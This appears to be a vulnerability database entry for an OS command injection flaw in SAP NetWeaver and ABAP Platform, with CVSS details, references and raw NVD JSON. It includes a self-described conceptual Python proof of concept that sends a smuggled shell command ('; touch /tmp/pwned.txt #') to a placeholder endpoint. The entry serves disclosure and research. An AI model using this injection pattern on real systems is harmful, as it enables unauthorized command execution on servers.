CVE-2026-40135

Description

An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Application Server for ABAP (具体受影响版本请参考 SAP Note 3730019)

SAP ABAP Platform (具体受影响版本请参考 SAP Note 3730019)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (Conceptual)
# This script demonstrates how an authenticated admin might exploit the command injection.
# Note: Actual endpoints require specific knowledge of the vulnerable SAP service.

import requests

# Target URL (Example)
target_url = "https://<sap-server>/vulnerable_endpoint"

# Attacker's session cookie (Admin privileges required)
session_cookie = {"sap-usercontext": "admin_session_token"}

# Payload attempting to inject a shell command (e.g., creating a file)
# The injection point depends on the vulnerable parameter, here assumed to be 'config_param'
payload = "; touch /tmp/pwned.txt #"

params = {
    "action": "update_config",
    "config_param": payload  # Malicious input
}

try:
    response = requests.post(target_url, data=params, cookies=session_cookie, verify=False)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print(f"[+] Server response: {response.text[:100]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40135
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40135
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40135/
[4] VulDB https://vuldb.com/cve/CVE-2026-40135
[5] https://me.sap.com/notes/3730019
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40135", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:12.430", "lastModified": "2026-05-12T03:16:12.430", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://me.sap.com/notes/3730019", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}